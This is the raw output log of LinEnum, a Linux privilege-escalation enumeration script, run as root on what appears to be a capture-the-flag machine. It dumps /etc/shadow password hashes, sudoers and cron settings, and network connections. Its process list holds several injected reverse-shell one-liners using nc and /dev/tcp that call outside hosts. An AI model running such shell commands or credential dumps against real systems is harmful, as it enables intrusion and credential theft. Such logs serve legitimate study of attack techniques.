########################################################## Local Linux Enumera

1. #########################################################
2. # Local Linux Enumeration & Privilege Escalation Script #
3. #########################################################
4. # www.rebootuser.com
5. # version 0.94
6.  
7. [-] Debug Info
8. [+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)
9.  
10.  
11. Scan started at:
12. Mon Jan 7 23:08:38 UTC 2019
13.  
14.  
15. ### SYSTEM ##############################################
16. [-] Kernel information:
17. Linux r1 4.15.0-24-generic #26-Ubuntu SMP Wed Jun 13 08:44:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
18.  
19.  
20. [-] Kernel information (continued):
21. Linux version 4.15.0-24-generic (buildd@lgw01-amd64-056) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #26-Ubuntu SMP Wed Jun 13 08:44:47 UTC 2018
22.  
23.  
24. [-] Specific release information:
25. DISTRIB_ID=Ubuntu
26. DISTRIB_RELEASE=16.04
27. DISTRIB_CODENAME=xenial
28. DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
29. NAME="Ubuntu"
30. VERSION="16.04.4 LTS (Xenial Xerus)"
31. ID=ubuntu
32. ID_LIKE=debian
33. PRETTY_NAME="Ubuntu 16.04.4 LTS"
34. VERSION_ID="16.04"
35. HOME_URL="http://www.ubuntu.com/"
36. SUPPORT_URL="http://help.ubuntu.com/"
37. BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
38. VERSION_CODENAME=xenial
39. UBUNTU_CODENAME=xenial
40.  
41.  
42. [-] Hostname:
43. r1
44.  
45.  
46. ### USER/GROUP ##########################################
47. [-] Current user/group info:
48. uid=0(root) gid=0(root) groups=0(root)
49.  
50.  
51. [-] Who else is logged on:
52. 23:08:38 up 2:24, 0 users, load average: 2.80, 3.93, 3.06
53. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
54.  
55.  
56. [-] Group memberships:
57. uid=0(root) gid=0(root) groups=0(root)
58. uid=1(daemon) gid=1(daemon) groups=1(daemon)
59. uid=2(bin) gid=2(bin) groups=2(bin)
60. uid=3(sys) gid=3(sys) groups=3(sys)
61. uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
62. uid=5(games) gid=60(games) groups=60(games)
63. uid=6(man) gid=12(man) groups=12(man)
64. uid=7(lp) gid=7(lp) groups=7(lp)
65. uid=8(mail) gid=8(mail) groups=8(mail)
66. uid=9(news) gid=9(news) groups=9(news)
67. uid=10(uucp) gid=10(uucp) groups=10(uucp)
68. uid=13(proxy) gid=13(proxy) groups=13(proxy)
69. uid=33(www-data) gid=33(www-data) groups=33(www-data)
70. uid=34(backup) gid=34(backup) groups=34(backup)
71. uid=38(list) gid=38(list) groups=38(list)
72. uid=39(irc) gid=39(irc) groups=39(irc)
73. uid=41(gnats) gid=41(gnats) groups=41(gnats)
74. uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
75. uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
76. uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
77. uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
78. uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
79. uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
80. uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
81. uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
82. uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
83. uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
84. uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
85. uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
86. uid=111(pollinate) gid=1(daemon) groups=1(daemon)
87. uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)
88. uid=112(quagga) gid=117(quagga) groups=117(quagga)
89.  
90.  
91. [-] It looks like we have some admin users:
92. uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
93. uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)
94.  
95.  
96. [-] Contents of /etc/passwd:
97. root:x:0:0:root:/root:/bin/bash
98. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
99. bin:x:2:2:bin:/bin:/usr/sbin/nologin
100. sys:x:3:3:sys:/dev:/usr/sbin/nologin
101. sync:x:4:65534:sync:/bin:/bin/sync
102. games:x:5:60:games:/usr/games:/usr/sbin/nologin
103. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
104. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
105. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
106. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
107. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
108. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
109. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
110. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
111. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
112. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
113. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
114. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
115. systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
116. systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
117. systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
118. systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
119. syslog:x:104:108::/home/syslog:/bin/false
120. _apt:x:105:65534::/nonexistent:/bin/false
121. lxd:x:106:65534::/var/lib/lxd/:/bin/false
122. messagebus:x:107:111::/var/run/dbus:/bin/false
123. uuidd:x:108:112::/run/uuidd:/bin/false
124. dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
125. sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
126. pollinate:x:111:1::/var/cache/pollinate:/bin/false
127. ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
128. quagga:x:112:117:Quagga routing suite,,,:/var/run/quagga/:/bin/false
129.  
130.  
131. [+] We can read the shadow file!
132. root:$6$39RGMx6s$l.2O2Uc8z73bzQ.JpJxXCVvOVnHdjPebC511IIeN.tX6l/PEUDB3bhvChSS2zuy8zVOtkSy2VNJ1Bf75.Qr4t1:17903:0:99999:7:::
133. daemon:*:17704:0:99999:7:::
134. bin:*:17704:0:99999:7:::
135. sys:*:17704:0:99999:7:::
136. sync:*:17704:0:99999:7:::
137. games:*:17704:0:99999:7:::
138. man:*:17704:0:99999:7:::
139. lp:*:17704:0:99999:7:::
140. mail:*:17704:0:99999:7:::
141. news:*:17704:0:99999:7:::
142. uucp:*:17704:0:99999:7:::
143. proxy:*:17704:0:99999:7:::
144. www-data:*:17704:0:99999:7:::
145. backup:*:17704:0:99999:7:::
146. list:*:17704:0:99999:7:::
147. irc:*:17704:0:99999:7:::
148. gnats:*:17704:0:99999:7:::
149. nobody:*:17704:0:99999:7:::
150. systemd-timesync:*:17704:0:99999:7:::
151. systemd-network:*:17704:0:99999:7:::
152. systemd-resolve:*:17704:0:99999:7:::
153. systemd-bus-proxy:*:17704:0:99999:7:::
154. syslog:*:17704:0:99999:7:::
155. _apt:*:17704:0:99999:7:::
156. lxd:*:17704:0:99999:7:::
157. messagebus:*:17704:0:99999:7:::
158. uuidd:*:17704:0:99999:7:::
159. dnsmasq:*:17704:0:99999:7:::
160. sshd:*:17704:0:99999:7:::
161. pollinate:*:17704:0:99999:7:::
162. ubuntu:$6$mUl1xHIc$imY3ECxHews2PTpfqK0WQ5SK58eKMPSFEjJy8StuWIEiOCBsg1N/NsrYxwSK8lLKyhH3c.nU4rcs9wI3RNkd71:17903:0:99999:7:::
163. quagga:*:17713:0:99999:7:::
164.  
165.  
166. [-] Super user account(s):
167. root
168.  
169.  
170. [-] Sudoers configuration (condensed):Defaults env_reset
171. Defaults mail_badpass
172. Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
173. root ALL=(ALL:ALL) ALL
174. %admin ALL=(ALL) ALL
175. %sudo ALL=(ALL:ALL) ALL
176.  
177.  
178. [+] We can sudo without supplying a password!
179. Matching Defaults entries for root on r1:
180. env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
181.  
182. User root may run the following commands on r1:
183. (ALL : ALL) ALL
184.  
185.  
186. [+] We can read root's home directory!
187. total 84K
188. drwx------ 1 root root 226 Jan 7 23:06 .
189. drwxr-xr-x 1 root root 140 Jun 22 2018 ..
190. -rw-r--r-- 1 root root 3.1K Jul 2 2018 .bashrc
191. drwx------ 1 root root 40 Jul 2 2018 .cache
192. -rwxr-xr-x 1 root root 45K Jan 5 21:28 LinEnum.sh
193. drwxr-xr-x 1 root root 0 Jul 2 2018 .nano
194. -rw-r--r-- 1 root root 7.1K Jan 7 23:08 output.txt
195. prw-r--r-- 1 root root 0 Jan 7 20:57 pipe
196. -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
197. -rw-r--r-- 1 root root 66 Jul 2 2018 .selected_editor
198. -rwxr-xr-x 1 root root 66 Jan 7 22:52 shell.sh
199. drwx------ 1 root root 84 Jan 7 20:55 .ssh
200. -rw-r--r-- 1 root root 0 Jul 3 2018 test_intercept.pcap
201. -rw-r--r-- 1 root root 33 Jul 2 2018 user.txt
202. -rw------- 1 root root 5.0K Jul 3 2018 .viminfo
203.  
204.  
205. [-] Are permissions on /home directories lax:
206. total 0
207. drwxr-xr-x 1 root root 12 Jul 1 2018 .
208. drwxr-xr-x 1 root root 140 Jun 22 2018 ..
209. drwxr-xr-x 1 ubuntu ubuntu 62 Jul 1 2018 ubuntu
210.  
211.  
212. ### ENVIRONMENTAL #######################################
213. [-] Environment information:
214. XDG_SESSION_ID=317
215. SHELL=/bin/bash
216. SSH_CLIENT=10.99.64.251 48274 22
217. USER=root
218. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
219. MAIL=/var/mail/root
220. PWD=/root
221. LANG=en_US.UTF-8
222. HOME=/root
223. SHLVL=5
224. LOGNAME=root
225. SSH_CONNECTION=10.99.64.251 48274 10.99.64.2 22
226. VTYSH_PAGER=more
227. VIMRUNTIME=/usr/share/vim/vim74
228. XDG_RUNTIME_DIR=/run/user/0
229. VIM=/usr/share/vim
230. _=/usr/bin/env
231.  
232.  
233. [-] Path information:
234. /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
235.  
236.  
237. [-] Available shells:
238. # /etc/shells: valid login shells
239. /bin/sh
240. /bin/dash
241. /bin/bash
242. /bin/rbash
243. /usr/bin/tmux
244. /usr/bin/screen
245.  
246.  
247. [-] Current umask value:
248. 0022
249. u=rwx,g=rx,o=rx
250.  
251.  
252. [-] umask value as specified in /etc/login.defs:
253. UMASK 022
254.  
255.  
256. [-] Password and storage information:
257. PASS_MAX_DAYS 99999
258. PASS_MIN_DAYS 0
259. PASS_WARN_AGE 7
260. ENCRYPT_METHOD SHA512
261.  
262.  
263. ### JOBS/TASKS ##########################################
264. [-] Cron jobs:
265. -rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
266.  
267. /etc/cron.d:
268. total 12
269. drwxr-xr-x 1 root root 70 Jun 22 2018 .
270. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
271. -rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
272. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
273. -rw-r--r-- 1 root root 190 Jun 22 2018 popularity-contest
274.  
275. /etc/cron.daily:
276. total 48
277. drwxr-xr-x 1 root root 234 Jul 1 2018 .
278. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
279. -rwxr-xr-x 1 root root 376 Mar 31 2016 apport
280. -rwxr-xr-x 1 root root 1474 Mar 6 2018 apt-compat
281. -rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
282. -rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
283. -rwxr-xr-x 1 root root 372 May 6 2015 logrotate
284. -rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
285. -rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
286. -rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
287. -rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
288. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
289. -rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
290. -rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common
291.  
292. /etc/cron.hourly:
293. total 4
294. drwxr-xr-x 1 root root 24 Jun 22 2018 .
295. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
296. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
297.  
298. /etc/cron.monthly:
299. total 4
300. drwxr-xr-x 1 root root 24 Jun 22 2018 .
301. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
302. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
303.  
304. /etc/cron.weekly:
305. total 16
306. drwxr-xr-x 1 root root 92 Jul 1 2018 .
307. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
308. -rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
309. -rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
310. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
311. -rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common
312.  
313.  
314. [-] Crontab contents:
315. # /etc/crontab: system-wide crontab
316. # Unlike any other crontab you don't have to run the `crontab'
317. # command to install the new version when you edit this file
318. # and files in /etc/cron.d. These files also have username fields,
319. # that none of the other crontabs do.
320.  
321. SHELL=/bin/sh
322. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
323.  
324. # m h dom mon dow user command
325. 17 * * * * root cd / && run-parts --report /etc/cron.hourly
326. 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
327. 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
328. 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
329. #
330.  
331.  
332. [-] Anything interesting in /var/spool/cron/crontabs:
333. total 4
334. drwx-wx--T 1 root crontab 8 Jan 7 22:07 .
335. drwxr-xr-x 1 root root 42 Jun 22 2018 ..
336. -rw------- 1 root crontab 1118 Jul 2 2018 root
337.  
338.  
339. [-] Jobs held by all users:
340. # Edit this file to introduce tasks to be run by cron.
341. #
342. # Each task to run has to be defined through a single line
343. # indicating with different fields when the task will be run
344. # and what command to run for the task
345. #
346. # To define the time you can provide concrete values for
347. # minute (m), hour (h), day of month (dom), month (mon),
348. # and day of week (dow) or use '*' in these fields (for 'any').#
349. # Notice that tasks will be started based on the cron's system
350. # daemon's notion of time and timezones.
351. #
352. # Output of the crontab jobs (including errors) is sent through
353. # email to the user the crontab file belongs to (unless redirected).
354. #
355. # For example, you can run a backup of all your user accounts
356. # at 5 a.m every week with:
357. # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
358. #
359. # For more information see the manual pages of crontab(5) and cron(8)
360. #
361. # m h dom mon dow command
362. */10 * * * * /opt/restore.sh
363.  
364.  
365. [-] Systemd timers:
366. NEXT LEFT LAST PASSED UNIT ACTIVATES
367. Tue 2019-01-08 06:46:32 UTC 7h left Mon 2019-01-07 20:44:05 UTC 2h 24min ago apt-daily-upgrade.timer apt-daily-upgrade.service
368. Tue 2019-01-08 17:44:13 UTC 18h left Mon 2019-01-07 20:44:05 UTC 2h 24min ago apt-daily.timer apt-daily.service
369. Tue 2019-01-08 20:58:58 UTC 21h left Mon 2019-01-07 20:58:58 UTC 2h 9min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
370.  
371. 3 timers listed.
372. Enable thorough tests to see inactive timers
373.  
374.  
375. ### NETWORKING ##########################################
376. [-] Network and IP info:
377. eth0 Link encap:Ethernet HWaddr 00:16:3e:d9:04:ea
378. inet addr:10.99.64.2 Bcast:10.99.64.255 Mask:255.255.255.0
379. inet6 addr: fe80::216:3eff:fed9:4ea/64 Scope:Link
380. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
381. RX packets:16929 errors:0 dropped:0 overruns:0 frame:0
382. TX packets:13670 errors:0 dropped:0 overruns:0 carrier:0
383. collisions:0 txqueuelen:1000
384. RX bytes:7577356 (7.5 MB) TX bytes:23523353 (23.5 MB)
385.  
386. eth1 Link encap:Ethernet HWaddr 00:16:3e:8a:f2:4f
387. inet addr:10.78.10.1 Bcast:10.78.10.255 Mask:255.255.255.0
388. inet6 addr: fe80::216:3eff:fe8a:f24f/64 Scope:Link
389. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
390. RX packets:1001 errors:0 dropped:0 overruns:0 frame:0
391. TX packets:931 errors:0 dropped:0 overruns:0 carrier:0
392. collisions:0 txqueuelen:1000
393. RX bytes:71758 (71.7 KB) TX bytes:63054 (63.0 KB)
394.  
395. eth2 Link encap:Ethernet HWaddr 00:16:3e:20:98:df
396. inet addr:10.78.11.1 Bcast:10.78.11.255 Mask:255.255.255.0
397. inet6 addr: fe80::216:3eff:fe20:98df/64 Scope:Link
398. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
399. RX packets:707 errors:0 dropped:0 overruns:0 frame:0
400. TX packets:2811 errors:0 dropped:0 overruns:0 carrier:0
401. collisions:0 txqueuelen:1000
402. RX bytes:49606 (49.6 KB) TX bytes:155949 (155.9 KB)
403.  
404. lo Link encap:Local Loopback
405. inet addr:127.0.0.1 Mask:255.0.0.0
406. inet6 addr: ::1/128 Scope:Host
407. UP LOOPBACK RUNNING MTU:65536 Metric:1
408. RX packets:24489 errors:0 dropped:0 overruns:0 frame:0
409. TX packets:24489 errors:0 dropped:0 overruns:0 carrier:0
410. collisions:0 txqueuelen:1000
411. RX bytes:1085180 (1.0 MB) TX bytes:1085180 (1.0 MB)
412.  
413. lo:0 Link encap:Local Loopback
414. inet addr:10.120.15.10 Mask:255.255.255.128
415. UP LOOPBACK RUNNING MTU:65536 Metric:1
416.  
417.  
418. [-] ARP history:
419. ? (10.78.11.2) at 00:16:3e:c4:fa:83 [ether] on eth2
420. ? (10.78.10.2) at 00:16:3e:5b:49:a9 [ether] on eth1
421. ? (10.99.64.251) at 00:16:3e:f3:92:14 [ether] on eth0
422. ? (10.99.64.1) at fe:0d:18:88:55:67 [ether] on eth0
423.  
424.  
425. [-] Default route:
426. default 10.99.64.1 0.0.0.0 UG 0 0 0 eth0
427.  
428.  
429. [-] Listening TCP:
430. Active Internet connections (servers and established)
431. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
432. tcp 0 0 127.0.0.1:2601 0.0.0.0:* LISTEN 6824/zebra
433. tcp 0 0 127.0.0.1:2605 0.0.0.0:* LISTEN 6828/bgpd
434. tcp 0 0 0.0.0.0:179 0.0.0.0:* LISTEN 6828/bgpd
435. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 3455/sshd
436. tcp 0 0 10.99.64.2:22 10.99.64.251:46856 ESTABLISHED 1085/sshd: root@not
437. tcp 0 0 10.99.64.2:22 10.99.64.251:47954 ESTABLISHED 5394/sshd: root@not
438. tcp 0 0 10.78.11.1:179 10.78.11.2:35148 ESTABLISHED 6828/bgpd
439. tcp 0 0 10.99.64.2:22 10.99.64.251:47500 ESTABLISHED 4144/sshd: root@not
440. tcp 0 0 10.99.64.2:22 10.99.64.251:47966 ESTABLISHED 5433/sshd: root@not
441. tcp 0 0 10.78.10.1:54166 10.78.10.2:179 ESTABLISHED 6828/bgpd
442. tcp 0 0 10.99.64.2:22 10.99.64.251:46974 ESTABLISHED 2262/sshd: root@not
443. tcp 0 0 10.99.64.2:55940 10.10.12.58:2222 ESTABLISHED 3953/bash
444. tcp 0 0 10.99.64.2:22 10.99.64.251:48054 ESTABLISHED 5908/sshd: root@not
445. tcp 0 0 10.99.64.2:22 10.99.64.251:48020 ESTABLISHED 5689/sshd: root@not
446. tcp 0 0 10.99.64.2:22 10.99.64.251:48130 ESTABLISHED 6216/sshd: root@not
447. tcp 0 0 10.99.64.2:22 10.99.64.251:47806 ESTABLISHED 4451/sshd: root@not
448. tcp 0 0 10.99.64.2:50394 10.10.15.100:1234 ESTABLISHED 5284/nc
449. tcp 0 0 10.99.64.2:22 10.99.64.251:47930 ESTABLISHED 5247/sshd: root@not
450. tcp 0 0 10.99.64.2:37500 10.10.15.171:1002 ESTABLISHED 6533/nc
451. tcp 0 0 10.99.64.2:22 10.99.64.251:48092 ESTABLISHED 6064/sshd: root@not
452. tcp 0 0 10.99.64.2:53512 10.10.13.63:1234 ESTABLISHED 1252/nc
453. tcp 0 0 10.99.64.2:22 10.99.64.251:46868 ESTABLISHED 1218/sshd: root@not
454. tcp 0 0 10.99.64.2:22 10.99.64.251:46882 ESTABLISHED 1441/sshd: root@not
455. tcp 0 0 10.99.64.2:22 10.99.64.251:47934 ESTABLISHED 5299/sshd: root@not
456. tcp 0 0 10.99.64.2:22 10.99.64.251:48028 ESTABLISHED 5728/sshd: root@not
457. tcp 0 0 10.99.64.2:22 10.99.64.251:48244 ESTABLISHED 6709/sshd: root@not
458. tcp 0 0 10.99.64.2:22 10.99.64.251:48046 ESTABLISHED 5869/sshd: root@not
459. tcp 0 0 10.99.64.2:22 10.99.64.251:48206 ESTABLISHED 6540/sshd: root@not
460. tcp 0 0 10.99.64.2:45760 10.10.14.30:9998 ESTABLISHED 2295/bash
461. tcp 0 0 10.99.64.2:22 10.99.64.251:48188 ESTABLISHED 6451/sshd: root@not
462. tcp 0 0 10.99.64.2:22 10.99.64.251:46860 ESTABLISHED 1130/sshd: root@not
463. tcp 0 0 10.99.64.2:22 10.99.64.251:48128 ESTABLISHED 6177/sshd: root@not
464. tcp 0 0 10.99.64.2:22 10.99.64.251:48274 ESTABLISHED 7141/sshd: root@not
465. tcp 0 0 10.99.64.2:22 10.99.64.251:48196 ESTABLISHED 6496/sshd: root@not
466. tcp 0 0 10.99.64.2:22 10.99.64.251:48004 ESTABLISHED 5647/sshd: root@not
467. tcp 0 0 10.99.64.2:22 10.99.64.251:47818 ESTABLISHED 4495/sshd: root@not
468. tcp 0 0 10.99.64.2:47334 10.10.15.171:1001 ESTABLISHED 6752/nc
469. tcp 0 0 10.99.64.2:46894 10.10.15.171:1001 ESTABLISHED 4488/nc
470. tcp 0 0 10.99.64.2:22 10.99.64.251:48056 ESTABLISHED 5947/sshd: root@not
471. tcp 0 0 10.99.64.2:22 10.99.64.251:47920 ESTABLISHED 5171/sshd: root@not
472. tcp 0 0 10.99.64.2:22 10.99.64.251:47950 ESTABLISHED 5354/sshd: root@not
473. tcp 0 0 10.99.64.2:46906 10.10.15.171:1001 ESTABLISHED 4532/nc
474. tcp 0 0 10.99.64.2:22 10.99.64.251:48170 ESTABLISHED 6334/sshd: root@not
475. tcp 0 0 10.99.64.2:22 10.99.64.251:47188 ESTABLISHED 3622/sshd: root@not
476. tcp 0 0 10.99.64.2:22 10.99.64.251:48146 ESTABLISHED 6258/sshd: root@not
477. tcp 0 0 10.99.64.2:42080 10.10.15.233:8765 ESTABLISHED 7174/bash
478. tcp 0 0 10.99.64.2:22 10.99.64.251:47784 ESTABLISHED 4302/sshd: root@not
479. tcp 0 0 10.99.64.2:22 10.99.64.251:47246 ESTABLISHED 3918/sshd: root@not
480. tcp6 0 0 :::179 :::* LISTEN 6828/bgpd
481. tcp6 0 0 :::22 :::* LISTEN 3455/sshd
482.  
483.  
484. [-] Listening UDP:
485. Active Internet connections (servers and established)
486. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
487. udp 1408 0 10.99.64.2:35127 10.10.15.233:9000 ESTABLISHED 5984/nc
488. udp 0 0 10.99.64.2:41287 10.10.15.233:9000 ESTABLISHED 5945/nc
489. udp 0 0 10.99.64.2:55664 10.10.15.233:9000 ESTABLISHED 6214/nc
490.  
491.  
492. ### SERVICES #############################################
493. [-] Running processes:
494. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
495. root 1 0.0 0.2 45836 5752 ? Ss 20:43 0:02 /sbin/init
496. root 51 0.0 0.2 35272 4652 ? Ss 20:43 0:00 /lib/systemd/systemd-journald
497. root 66 0.0 0.1 41720 3072 ? Ss 20:43 0:00 /lib/systemd/systemd-udevd
498. message+ 475 0.0 0.1 42896 3464 ? Ss 20:44 0:01 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
499. root 479 0.0 0.2 274488 5660 ? Ssl 20:44 0:00 /usr/lib/accountsservice/accounts-daemon
500. root 480 0.0 0.1 27728 2536 ? Ss 20:44 0:00 /usr/sbin/cron -f
501. root 481 0.0 0.1 28544 2916 ? Ss 20:44 0:00 /lib/systemd/systemd-logind
502. root 484 0.0 1.1 216564 22920 ? Ssl 20:44 0:00 /usr/lib/snapd/snapd
503. daemon 485 0.0 0.0 26044 1968 ? Ss 20:44 0:00 /usr/sbin/atd -f
504. root 488 0.0 0.0 5220 112 ? Ss 20:44 0:00 /sbin/iscsid
505. root 489 0.0 0.1 5720 3536 ? SLs 20:44 0:01 /sbin/iscsid
506. root 507 0.0 0.2 277176 5684 ? Ssl 20:44 0:00 /usr/lib/policykit-1/polkitd --no-debug
507. root 521 0.0 0.0 14472 1616 console Ss+ 20:44 0:00 /sbin/agetty --noclear --keep-baud console 115200 38400 9600 linux
508. root 774 0.0 0.2 36684 4516 ? Ss 20:46 0:00 /lib/systemd/systemd --user
509. root 775 0.0 0.0 60884 1544 ? S 20:46 0:00 (sd-pam)
510. root 1085 0.0 0.1 92796 2568 ? Ss 20:49 0:00 sshd: root@notty
511. root 1115 0.0 0.0 11236 1676 ? Ss 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
512. root 1122 0.0 0.0 11236 196 ? S 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
513. root 1123 0.0 0.0 12944 444 ? S 20:49 0:00 grep -v grep
514. root 1130 0.0 0.1 92796 2548 ? Ss 20:49 0:00 sshd: root@notty
515. root 1160 0.0 0.0 11236 1600 ? Ss 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
516. root 1167 0.0 0.0 11236 196 ? S 20:49 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
517. root 1168 0.0 0.0 12944 452 ? S 20:49 0:00 grep -v grep
518. root 1218 0.0 0.1 92796 2692 ? Ss 20:50 0:00 sshd: root@notty
519. root 1248 0.0 0.0 11232 1732 ? Ss 20:50 0:00 bash -c ps waux | grep ; mkfifo pipe; nc -nv 10.10.13.63 1234 < pipe | /bin/sh 2>pipe >pipe | grep -v grep
520. root 1252 0.0 0.0 11300 1708 ? S 20:50 0:00 nc -nv 10.10.13.63 1234
521. root 1253 0.0 0.0 4504 792 ? S 20:50 0:00 /bin/sh
522. root 1255 0.0 0.1 19896 2076 ? S 20:50 0:00 /bin/bash -i
523. root 1441 0.0 0.1 92796 2500 ? Ss 20:51 0:00 sshd: root@notty
524. root 1471 0.0 0.0 11236 1680 ? Ss 20:51 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
525. root 1478 0.0 0.0 11236 196 ? S 20:51 0:00 bash -c ps waux | grep |rm /tmp/f;mkfifo /tmp/f;ci?x!t /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.69 9988 >/tmp/f | grep -v grep
526. root 1479 0.0 0.0 12944 332 ? S 20:51 0:00 grep -v grep
527. root 2262 0.0 0.1 92796 2648 ? Ss 20:57 0:00 sshd: root@notty
528. root 2292 0.0 0.0 11232 1840 ? Ss 20:58 0:00 bash -c ps waux | grep ;bash -i >& /dev/tcp/10.10.14.30/9998 0>&1 | grep -v grep
529. root 2295 0.0 0.1 19896 2136 ? S 20:58 0:00 bash -i
530. root 3455 0.0 0.2 65508 4060 ? Ss 21:14 0:00 /usr/sbin/sshd -D
531. root 3622 0.0 0.1 92796 3864 ? Ss 21:23 0:00 sshd: root@notty
532. root 3652 0.0 0.1 11232 2192 ? Ss 21:23 0:00 bash -c ps waux | grep ; tcpdump -i lo:0 -vv | grep -v grep
533. root 3655 0.0 0.3 24800 6352 ? S 21:23 0:00 tcpdump -i lo:0 -vv
534. root 3656 0.0 0.0 12944 984 ? S 21:23 0:00 grep -v grep
